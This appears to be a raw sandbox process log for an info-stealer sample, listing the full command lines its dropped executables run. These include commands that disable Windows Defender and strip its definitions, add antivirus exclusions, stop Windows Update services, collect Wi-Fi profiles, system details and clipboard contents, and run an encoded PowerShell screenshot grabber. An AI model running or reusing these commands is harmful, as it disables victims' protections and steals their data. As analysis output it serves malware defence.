                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4kug0kj4\4kug0kj4.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES46F0.tmp" "c:\Users\user\AppData\Local\Temp\4kug0kj4\CSCF8A59A62395742289D2EBFCBD5DF8363.TMP"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q5r0u5fp\q5r0u5fp.cmdline"
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES541F.tmp" "c:\Windows\System32\CSCF38C3B75506F4C2796D96D17B23CB45.TMP"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                  Source: unknownProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                  Source: unknownProcess created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exe"
                                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"Jump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogymJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: unknown unknownJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogym
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI26762\s.exeProcess created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"
                                  Source: C:\ProgramData\svchost.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\ProgramData\setup.exeProcess created: unknown unknown
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
